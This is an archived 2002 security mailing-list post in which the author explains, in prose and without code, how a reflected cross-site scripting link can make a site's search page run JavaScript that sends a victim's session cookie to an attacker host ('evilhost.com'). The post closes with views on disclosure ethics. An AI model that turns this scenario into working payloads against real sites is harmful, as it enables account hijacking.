> Maybe I have completely missed the boat on this one, and if so, > please explain how I could attack someone ELSE with these... A friend just explained it to me. I guess I kinda did miss the boat... I will explain it here so that others who are confused as I was can learn from this as well. If my reasoning is flawed, I would like to hear about it: The victim has an account on a site which uses cookies for authentication. An attacker sends them a link (in email, or otherwise) to that site with javascript encoded in the GET of the URL. This GET string activates the search functionality of the site, thus causing the javascript to be run, which steals the victim's cookie and sends it back to evilhost.com in another GET. Of course other scenarios exist, but this is just one example. Side note: On the subject of ethics... I am all for full-disclosure policies. However, in many cases, disclosing web application vulnerabilities is senseless if the application is only served up by a single entity. The whole point in disclosure is so that those running the buggy applications can do the footwork and download the applicable patches. In the case of custom web applications that run on one small set of servers, I don't see how full disclosure PRIOR to a fix is needed. If a web application is buggy, and it is only running on one site, a fix benefits ALL users immediately. Disclosure prior to this only opens the site and its users up for attack. Of course if the people running the site refuse to fix it, that is another matter... sincerely, tim
This archive was generated by hypermail 2b30 : Tue Jan 29 2002 - 15:08:09 PST